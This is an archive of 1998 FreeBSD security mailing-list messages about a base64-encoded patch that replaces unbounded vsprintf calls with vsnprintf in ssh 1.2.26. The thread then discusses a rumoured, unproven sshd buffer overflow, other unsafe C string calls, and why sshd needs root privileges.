cikNCiAgICAgZnByaW50ZihzdGRlcnIsICJkZWJ1ZzogJXNcbiIsIGJ1Zik7 DQpAQCAtMjA3LDcgKzIwNyw3IEBADQogICBpZiAobG9nX3F1aWV0KQ0KICAg ICByZXR1cm47DQogICB2YV9zdGFydChhcmdzLCBmbXQpOw0KLSAgdnNwcmlu dGYoYnVmLCBmbXQsIGFyZ3MpOw0KKyAgdnNucHJpbnRmKGJ1Ziwgc2l6ZW9m KGJ1ZiksIGZtdCwgYXJncyk7DQogICB2YV9lbmQoYXJncyk7DQogICBpZiAo bG9nX29uX3N0ZGVycikNCiAgICAgZnByaW50ZihzdGRlcnIsICJlcnJvcjog JXNcbiIsIGJ1Zik7DQpAQCAtMzAyLDcgKzMwMiw3IEBADQogICBpZiAobG9n X3F1aWV0KQ0KICAgICBleGl0KDEpOw0KICAgdmFfc3RhcnQoYXJncywgZm10 KTsNCi0gIHZzcHJpbnRmKGJ1ZiwgZm10LCBhcmdzKTsNCisgIHZzbnByaW50 ZihidWYsIHNpemVvZihidWYpLCBmbXQsIGFyZ3MpOw0KICAgdmFfZW5kKGFy Z3MpOw0KICAgaWYgKGxvZ19vbl9zdGRlcnIpDQogICAgIGZwcmludGYoc3Rk ZXJyLCAiZmF0YWw6ICVzXG4iLCBidWYpOw0KQEAgLTMyMSw3ICszMjEsNyBA QA0KICAgaWYgKGxvZ19xdWlldCkNCiAgICAgZXhpdCgxKTsNCiAgIHZhX3N0 YXJ0KGFyZ3MsIGZtdCk7DQotICB2c3ByaW50ZihidWYsIGZtdCwgYXJncyk7 DQorICB2c25wcmludGYoYnVmLCBzaXplb2YoYnVmKSwgZm10LCBhcmdzKTsN CiAgIHZhX2VuZChhcmdzKTsNCiAgIGlmIChsb2dfb25fc3RkZXJyKQ0KICAg ICBmcHJpbnRmKHN0ZGVyciwgImZhdGFsOiAlc1xuIiwgYnVmKTsNCi0tLSBw YWNrZXQuYy5vcmlnCVN1biBOb3YgIDEgMTg6MTY6MzMgMTk5OA0KKysrIHBh Y2tldC5jCVN1biBOb3YgIDEgMTg6MjU6MTEgMTk5OA0KQEAgLTY5Myw3ICs2 OTMsNyBAQA0KICAgdmFfbGlzdCBhcmdzOw0KICAgDQogICB2YV9zdGFydChh cmdzLCBmbXQpOw0KLSAgdnNwcmludGYoYnVmLCBmbXQsIGFyZ3MpOw0KKyAg dnNucHJpbnRmKGJ1Ziwgc2l6ZW9mKGJ1ZiksIGZtdCwgYXJncyk7DQogICB2 YV9lbmQoYXJncyk7DQogICANCiAgIHBhY2tldF9zdGFydChTU0hfTVNHX0RF QlVHKTsNCkBAIC03MTksNyArNzE5LDcgQEANCiAgIC8qIEZvcm1hdCB0aGUg bWVzc2FnZS4gIE5vdGUgdGhhdCB0aGUgY2FsbGVyIG11c3QgbWFrZSBzdXJl IHRoZSBtZXNzYWdlDQogICAgICBpcyBvZiBsaW1pdGVkIHNpemUuICovDQog ICB2YV9zdGFydChhcmdzLCBmbXQpOw0KLSAgdnNwcmludGYoYnVmLCBmbXQs IGFyZ3MpOw0KKyAgdnNucHJpbnRmKGJ1Ziwgc2l6ZW9mKGJ1ZiksIGZtdCwg YXJncyk7DQogICB2YV9lbmQoYXJncyk7DQogDQogICAvKiBTZW5kIHRoZSBk aXNjb25uZWN0IG1lc3NhZ2UgdG8gdGhlIG90aGVyIHNpZGUsIGFuZCB3YWl0 IGZvciBpdCB0byBnZXQgDQotLS0gc2NwLmMub3JpZwlTdW4gTm92ICAxIDE4 OjE2OjQxIDE5OTgNCisrKyBzY3AuYwlTdW4gTm92ICAxIDE4OjI1OjU2IDE5 OTgNCkBAIC0zMzIsNyArMzMyLDcgQEANCiAgIGNoYXIgYnVmWzEwMjRdOw0K IA0KICAgdmFfc3RhcnQoYXAsIGZtdCk7DQotICB2c3ByaW50ZihidWYsIGZt dCwgYXApOw0KKyAgdnNucHJpbnRmKGJ1Ziwgc2l6ZW9mKGJ1ZiksIGZtdCwg YXApOw0KICAgdmFfZW5kKGFwKTsNCiAgIGZwcmludGYoc3RkZXJyLCAiJXNc biIsIGJ1Zik7DQogICBleGl0KDI1NSk7DQo= --0-283913581-909963733=:17054-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Nov 1 15:58:17 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA28950 for freebsd-security-outgoing; Sun, 1 Nov 1998 15:58:17 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA28944 for ; Sun, 1 Nov 1998 15:58:14 -0800 (PST) (envelope-from jkh@time.cdrom.com) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id PAA21424; Sun, 1 Nov 1998 15:58:25 -0800 (PST) (envelope-from jkh@time.cdrom.com) To: "Matthew N. Dodd" cc: freebsd-security@FreeBSD.ORG Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) In-reply-to: Your message of "Sun, 01 Nov 1998 18:42:13 EST." Date: Sun, 01 Nov 1998 15:58:25 -0800 Message-ID: <21420.909964705@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Look for details on this tomorrow but here is a patch that addresses the > vsprintf calls in ssh 1.2.26. Is there a provable exploit for this also? - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Nov 1 16:03:57 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA00764 for freebsd-security-outgoing; Sun, 1 Nov 1998 16:03:57 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from sasami.jurai.net (sasami.jurai.net [207.153.65.3]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA00722 for ; Sun, 1 Nov 1998 16:03:51 -0800 (PST) (envelope-from winter@jurai.net) Received: from localhost (winter@localhost) by sasami.jurai.net (8.8.8/8.8.7) with SMTP id TAA14397; Sun, 1 Nov 1998 19:03:43 -0500 (EST) Date: Sun, 1 Nov 1998 19:03:42 -0500 (EST) From: "Matthew N. Dodd" To: "Jordan K. Hubbard" cc: freebsd-security@FreeBSD.ORG Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) In-Reply-To: <21420.909964705@time.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 1 Nov 1998, Jordan K. Hubbard wrote: > > Look for details on this tomorrow but here is a patch that addresses the > > vsprintf calls in ssh 1.2.26. > > Is there a provable exploit for this also? Not that I've seen. One is rumored to be floating around. The previous message (forwarded from rootshell to -security by someone else) has most of the info I've seen. I'll attempt to find out more from Alan Cox the next time he jumps on irc. -- | Matthew N. Dodd | 78 280Z | 75 164E | 84 245DL | FreeBSD/NetBSD/Sprite/VMS | | winter@jurai.net | This Space For Rent | ix86,sparc,m68k,pmax,vax | | http://www.jurai.net/~winter | Are you k-rad elite enough for my webpage? | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Nov 1 16:08:05 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA01865 for freebsd-security-outgoing; Sun, 1 Nov 1998 16:08:05 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA01858 for ; Sun, 1 Nov 1998 16:08:04 -0800 (PST) (envelope-from jkh@time.cdrom.com) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id QAA21502; Sun, 1 Nov 1998 16:08:16 -0800 (PST) (envelope-from jkh@time.cdrom.com) To: "Matthew N. Dodd" cc: freebsd-security@FreeBSD.ORG Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) In-reply-to: Your message of "Sun, 01 Nov 1998 19:03:42 EST." Date: Sun, 01 Nov 1998 16:08:15 -0800 Message-ID: <21498.909965295@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Not that I've seen. One is rumored to be floating around. Yeah, rumored is the right word. :) > The previous message (forwarded from rootshell to -security by someone > else) has most of the info I've seen. I read that too, yeah. Basically, I've seen evidence of provable buffer overflows (but not proven exploitability of same) and I've seen a hacked site who admins can't think of many other ways to be hacked and are pointing either correctly or incorrectly at ssh as the cause in their first round of theories. Either way, it's just all too guessy for me right now - I'd sure like to see an actual exploit here before declaring this most security scare concluded. :( - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Nov 1 16:11:13 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA02728 for freebsd-security-outgoing; Sun, 1 Nov 1998 16:11:13 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from sasami.jurai.net (sasami.jurai.net [207.153.65.3]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA02709 for ; Sun, 1 Nov 1998 16:11:08 -0800 (PST) (envelope-from winter@jurai.net) Received: from localhost (winter@localhost) by sasami.jurai.net (8.8.8/8.8.7) with SMTP id TAA14541; Sun, 1 Nov 1998 19:11:02 -0500 (EST) Date: Sun, 1 Nov 1998 19:11:00 -0500 (EST) From: "Matthew N. Dodd" To: "Jordan K. Hubbard" cc: freebsd-security@FreeBSD.ORG Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) In-Reply-To: <21498.909965295@time.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 1 Nov 1998, Jordan K. Hubbard wrote: > I read that too, yeah. Basically, I've seen evidence of provable > buffer overflows (but not proven exploitability of same) and I've seen > a hacked site who admins can't think of many other ways to be hacked > and are pointing either correctly or incorrectly at ssh as the cause > in their first round of theories. Either way, it's just all too > guessy for me right now - I'd sure like to see an actual exploit here > before declaring this most security scare concluded. :( Indeed. I attempted to keep my original message fairly neutral for that reason. At this point there isn't any reason not to go about fixing these potential problems though. -- | Matthew N. Dodd | 78 280Z | 75 164E | 84 245DL | FreeBSD/NetBSD/Sprite/VMS | | winter@jurai.net | This Space For Rent | ix86,sparc,m68k,pmax,vax | | http://www.jurai.net/~winter | Are you k-rad elite enough for my webpage? | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Nov 1 18:26:39 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA16309 for freebsd-security-outgoing; Sun, 1 Nov 1998 18:26:39 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from alcanet.com.au (border.alcanet.com.au [203.62.196.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA16302 for ; Sun, 1 Nov 1998 18:26:36 -0800 (PST) (envelope-from peter.jeremy@auss2.alcatel.com.au) Received: by border.alcanet.com.au id <40330>; Mon, 2 Nov 1998 13:25:51 +1100 Date: Mon, 2 Nov 1998 13:26:18 +1100 From: Peter Jeremy Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) To: freebsd-security@FreeBSD.ORG, winter@jurai.net Message-Id: <98Nov2.132551est.40330@border.alcanet.com.au> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Matthew N. Dodd" wrote: > At this point there isn't any reason not to go about fixing these >potential problems though. ssh also contains a large number of sprintf() calls. Not all of these are immediately innocuous. There are also 2 sscanf() calls with %s formats which could be dangerous. Not to mention the str[n]cat() and str[n]cpy() calls. Unfortunately I have another bushfire to worry about right now, or I'd check through them as well. The problem with C is that there are too many ways to shoot yourself in the foot... A full security audit on ssh (which it sounds like it might need) would be fairly time-consuming. Peter -- Peter Jeremy (VK2PJ) peter.jeremy@alcatel.com.au Alcatel Australia Limited 41 Mandible St Phone: +61 2 9690 5019 ALEXANDRIA NSW 2015 Fax: +61 2 9690 5247 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Nov 1 19:28:34 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA22594 for freebsd-security-outgoing; Sun, 1 Nov 1998 19:28:34 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA22588 for ; Sun, 1 Nov 1998 19:28:33 -0800 (PST) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) id TAA26673; Sun, 1 Nov 1998 19:27:25 -0800 (PST) Message-ID: <19981101192724.A26335@best.com> Date: Sun, 1 Nov 1998 19:27:24 -0800 From: "Jan B. Koum " To: Peter Jeremy Cc: freebsd-security@FreeBSD.ORG, winter@jurai.net Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) References: <98Nov2.132551est.40330@border.alcanet.com.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <98Nov2.132551est.40330@border.alcanet.com.au>; from Peter Jeremy on Mon, Nov 02, 1998 at 01:26:18PM +1100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Nov 02, 1998 at 01:26:18PM +1100, Peter Jeremy wrote: > "Matthew N. Dodd" wrote: > > At this point there isn't any reason not to go about fixing these > >potential problems though. > > ssh also contains a large number of sprintf() calls. Not all of these > are immediately innocuous. There are also 2 sscanf() calls with %s > formats which could be dangerous. Not to mention the str[n]cat() and > str[n]cpy() calls. Unfortunately I have another bushfire to worry > about right now, or I'd check through them as well. > > The problem with C is that there are too many ways to shoot yourself > in the foot... A full security audit on ssh (which it sounds like it > might need) would be fairly time-consuming. > > Peter > -- > Peter Jeremy (VK2PJ) peter.jeremy@alcatel.com.au > Alcatel Australia Limited > 41 Mandible St Phone: +61 2 9690 5019 > ALEXANDRIA NSW 2015 Fax: +61 2 9690 5247 > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message Which is why when you install ssh, you can run ./configure with "--disable-suid-ssh" argument. -- Yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Nov 1 20:31:02 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA01159 for freebsd-security-outgoing; Sun, 1 Nov 1998 20:31:02 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gatekeeper.iserver.com (gatekeeper.iserver.com [192.41.0.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA01144 for ; Sun, 1 Nov 1998 20:30:57 -0800 (PST) (envelope-from hart@iserver.com) Received: by gatekeeper.iserver.com; Sun, 1 Nov 1998 21:30:46 -0700 (MST) Received: from unknown(192.168.1.109) by gatekeeper.iserver.com via smap (V3.1.1) id xma013543; Sun, 1 Nov 98 21:30:42 -0700 Received: (hart@localhost) by anchovy.orem.iserver.com (8.8.8) id VAA20367; Sun, 1 Nov 1998 21:29:32 -0700 (MST) Date: Sun, 1 Nov 1998 21:29:32 -0700 (MST) From: Paul Hart X-Sender: hart@anchovy.orem.iserver.com To: "Jan B. Koum " cc: Peter Jeremy , freebsd-security@FreeBSD.ORG, winter@jurai.net Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) In-Reply-To: <19981101192724.A26335@best.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 1 Nov 1998, Jan B. Koum wrote: > Which is why when you install ssh, you can run ./configure with > "--disable-suid-ssh" argument. Which is a good thing, except for this time where the alleged hole appears to be in sshd, a problem a non-SUID ssh won't help. Paul Hart -- Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Nov 1 20:36:48 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA01976 for freebsd-security-outgoing; Sun, 1 Nov 1998 20:36:48 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA01963 for ; Sun, 1 Nov 1998 20:36:46 -0800 (PST) (envelope-from brett@lariat.org) Received: (from brett@localhost) by lariat.lariat.org (8.8.8/8.8.6) id VAA12306; Sun, 1 Nov 1998 21:36:28 -0700 (MST) Message-Id: <4.1.19981101213518.0462e910@127.0.0.1> X-Sender: brett@127.0.0.1 X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Sun, 01 Nov 1998 21:36:03 -0700 To: "Jan B. Koum " , Peter Jeremy From: Brett Glass Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) Cc: freebsd-security@FreeBSD.ORG, winter@jurai.net In-Reply-To: <19981101192724.A26335@best.com> References: <98Nov2.132551est.40330@border.alcanet.com.au> <98Nov2.132551est.40330@border.alcanet.com.au> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 07:27 PM 11/1/98 -0800, Jan B. Koum wrote: > Which is why when you install ssh, you can run ./configure with > "--disable-suid-ssh" argument. What does this argument do? (Yes, I've already applied patches and also replaced a few sprintf()s. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Nov 1 20:54:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA03787 for freebsd-security-outgoing; Sun, 1 Nov 1998 20:54:23 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA03777 for ; Sun, 1 Nov 1998 20:54:20 -0800 (PST) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) id UAA06801; Sun, 1 Nov 1998 20:54:04 -0800 (PST) Message-ID: <19981101205404.A6579@best.com> Date: Sun, 1 Nov 1998 20:54:04 -0800 From: "Jan B. Koum " To: Paul Hart Cc: Peter Jeremy , freebsd-security@FreeBSD.ORG, winter@jurai.net Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) References: <19981101192724.A26335@best.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: ; from Paul Hart on Sun, Nov 01, 1998 at 09:29:32PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Nov 01, 1998 at 09:29:32PM -0700, Paul Hart wrote: > On Sun, 1 Nov 1998, Jan B. Koum wrote: > > > Which is why when you install ssh, you can run ./configure with > > "--disable-suid-ssh" argument. > > Which is a good thing, except for this time where the alleged hole appears > to be in sshd, a problem a non-SUID ssh won't help. > > Paul Hart > > -- > Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. > hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ > Uhm.. I know that. I was replying to the message which talked about possible buffer overflow problems with ssh client. :) -- Yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Nov 1 21:00:47 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA04585 for freebsd-security-outgoing; Sun, 1 Nov 1998 21:00:47 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from fledge.watson.org (COPLAND.CODA.CS.CMU.EDU [128.2.222.48]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA04579 for ; Sun, 1 Nov 1998 21:00:46 -0800 (PST) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id AAA12214; Mon, 2 Nov 1998 00:00:23 -0500 (EST) Date: Mon, 2 Nov 1998 00:00:23 -0500 (EST) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: "Jan B. Koum " cc: Peter Jeremy , freebsd-security@FreeBSD.ORG, winter@jurai.net Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) In-Reply-To: <19981101192724.A26335@best.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 1 Nov 1998, Jan B. Koum wrote: > > The problem with C is that there are too many ways to shoot yourself > > in the foot... A full security audit on ssh (which it sounds like it > > might need) would be fairly time-consuming. > > Which is why when you install ssh, you can run ./configure with > "--disable-suid-ssh" argument. I imagine that the concern in the rootshell case is more that the daemon must run as root. It needs to do so for three reasons (that I can think of offhand): 1) To bind port 22 2) To read the system-wide SSH private key and most importantly: 3) To allow it to acquire the priveledges of the user who is logging in An alternative might be to have SSH run as non-root, give it a capability to have it bind 22, have the private key readable by that user, and then have it set up sockets to login (I don't know it can allocate vty's as non-root?) Then you don't get the SSH RSA-key behavior, but you'd get the rest. In a sense though, this is equivilent because: a buffer overflow allows the subversion of that SSH account, then that can be used to attach via debugging to the other sshd sessions to grab authentication information being forwarded to login. I guess you lose either way. Sensitive code (such as authentication code) must be written carefully. Robert N Watson Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org http://www.watson.org/~robert/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Nov 1 21:13:37 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA06585 for freebsd-security-outgoing; Sun, 1 Nov 1998 21:13:37 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from sasami.jurai.net (sasami.jurai.net [207.153.65.3]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA06579 for ; Sun, 1 Nov 1998 21:13:34 -0800 (PST) (envelope-from winter@jurai.net) Received: from localhost (winter@localhost) by sasami.jurai.net (8.8.8/8.8.7) with SMTP id AAA20231; Mon, 2 Nov 1998 00:13:24 -0500 (EST) Date: Mon, 2 Nov 1998 00:13:23 -0500 (EST) From: "Matthew N. Dodd" To: Peter Jeremy cc: freebsd-security@FreeBSD.ORG Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) In-Reply-To: <98Nov2.132551est.40330@border.alcanet.com.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 2 Nov 1998, Peter Jeremy wrote: > ssh also contains a large number of sprintf() calls. Not all of these > are immediately innocuous. There are also 2 sscanf() calls with %s > formats which could be dangerous. Not to mention the str[n]cat() and > str[n]cpy() calls. Unfortunately I have another bushfire to worry > about right now, or I'd check through them as well. ftp.jurai.net:/users/winter/ ssh1226.sprintf.patch ssh1226.vsprintf.patch > The problem with C is that there are too many ways to shoot yourself > in the foot... A full security audit on ssh (which it sounds like it > might need) would be fairly time-consuming. Indeed. My approach was (is) to address the easy things that could be broken. I'll probably work on sscanf issues next unless someone beats me to it. Going through the code and fixing improper logic I'll leave to someone with more of a burr up their ass. :) -- | Matthew N. Dodd | 78 280Z | 75 164E | 84 245DL | FreeBSD/NetBSD/Sprite/VMS | | winter@jurai.net | This Space For Rent | ix86,sparc,m68k,pmax,vax | | http://www.jurai.net/~winter | Are you k-rad elite enough for my webpage? | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Nov 1 21:13:50 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA06651 for freebsd-security-outgoing; Sun, 1 Nov 1998 21:13:50 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from burka.rdy.com (burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA06639 for ; Sun, 1 Nov 1998 21:13:48 -0800 (PST) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.8.8/RDY&DVV) id VAA25455; Sun, 1 Nov 1998 21:13:36 -0800 (PST) Message-Id: <199811020513.VAA25455@burka.rdy.com> Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) In-Reply-To: <19981101192724.A26335@best.com> from "Jan B. Koum " at "Nov 1, 1998 7:27:24 pm" To: jkb@best.com (Jan B. Koum ) Date: Sun, 1 Nov 1998 21:13:36 -0800 (PST) Cc: peter.jeremy@auss2.alcatel.com.au, freebsd-security@FreeBSD.ORG, winter@jurai.net X-Class: Fast Organization: HackerDome Reply-To: dima@best.net From: dima@best.net (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL45 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jan B. Koum writes: > Which is why when you install ssh, you can run ./configure with > "--disable-suid-ssh" argument. Which will introduce tonns of other problems. > > -- Yan > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Nov 1 21:16:03 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA07056 for freebsd-security-outgoing; Sun, 1 Nov 1998 21:16:03 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from sasami.jurai.net (sasami.jurai.net [207.153.65.3]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA07012 for ; Sun, 1 Nov 1998 21:16:01 -0800 (PST) (envelope-from winter@jurai.net) Received: from localhost (winter@localhost) by sasami.jurai.net (8.8.8/8.8.7) with SMTP id AAA20282; Mon, 2 Nov 1998 00:15:40 -0500 (EST) Date: Mon, 2 Nov 1998 00:15:40 -0500 (EST) From: "Matthew N. Dodd" To: Brett Glass cc: "Jan B. Koum " , Peter Jeremy , freebsd-security@FreeBSD.ORG Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) In-Reply-To: <4.1.19981101213518.0462e910@127.0.0.1> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 1 Nov 1998, Brett Glass wrote: > What does this argument do? (Yes, I've already applied patches and also > replaced a few sprintf()s. The client is installed suid root (for various reasons). The option in question disables this behavior. As sshd is binding and listening to a port below 1024 it must run as root. The alleged problem with sshd lies in the code that logs connections etc. -- | Matthew N. Dodd | 78 280Z | 75 164E | 84 245DL | FreeBSD/NetBSD/Sprite/VMS | | winter@jurai.net | This Space For Rent | ix86,sparc,m68k,pmax,vax | | http://www.jurai.net/~winter | Are you k-rad elite enough for my webpage? | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Nov 1 21:39:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA10475 for freebsd-security-outgoing; Sun, 1 Nov 1998 21:39:23 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA10469 for ; Sun, 1 Nov 1998 21:39:21 -0800 (PST) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) id VAA12288; Sun, 1 Nov 1998 21:38:18 -0800 (PST) Message-ID: <19981101213817.A11911@best.com> Date: Sun, 1 Nov 1998 21:38:17 -0800 From: "Jan B. Koum " To: dima@best.net Cc: peter.jeremy@auss2.alcatel.com.au, freebsd-security@FreeBSD.ORG, winter@jurai.net Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) References: <19981101192724.A26335@best.com> <199811020513.VAA25455@burka.rdy.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: 